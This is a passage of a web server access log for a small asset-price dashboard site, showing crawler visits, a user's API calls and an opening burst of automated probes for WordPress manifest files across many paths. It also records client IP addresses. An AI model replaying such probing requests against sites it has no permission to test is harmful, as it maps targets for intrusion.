(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:14 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 45.94.31.224] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[17/Feb/2026:19:02:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/robots.txt" [Client 74.7.244.29] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:02:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 74.7.241.33] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[17/Feb/2026:19:02:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:02:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 74.7.241.33] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:02:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 74.7.241.33] [Length 18163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:02:59 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:03:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/apple-touch-icon.png" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:03:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/static/js/app.js" +[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:19:59:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:59:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:59:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:19:59:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 4146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:20:01:27 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5982] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:20:58:30 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3686] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:23:04:17 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 18.219.145.200] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-" +[18/Feb/2026:03:16:32 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 139.59.91.96] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[18/Feb/2026:03:16:33 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/favicon.ico" [Client 139.59.91.96] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://asset.hanmocnn.co.kr/" +[18/Feb/2026:03:16:33 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 139.59.91.96] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[18/Feb/2026:03:16:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 139.59.91.96] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:03:50:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:03:50:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:03:51:26 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3629] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:06:36:00 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:06:36:00 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:06:36:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:06:36:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:06:38:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 11840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:17:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:17:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:19:08 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 8670] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 923] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:38:00 +0000] - 200 200 - POST https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:14:38:03 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 19904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:18:38:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.0.0 Safari/537.36" "-" +[18/Feb/2026:18:59:08 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Feb/2026:18:59:13 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:10:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[18/Feb/2026:20:10:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] 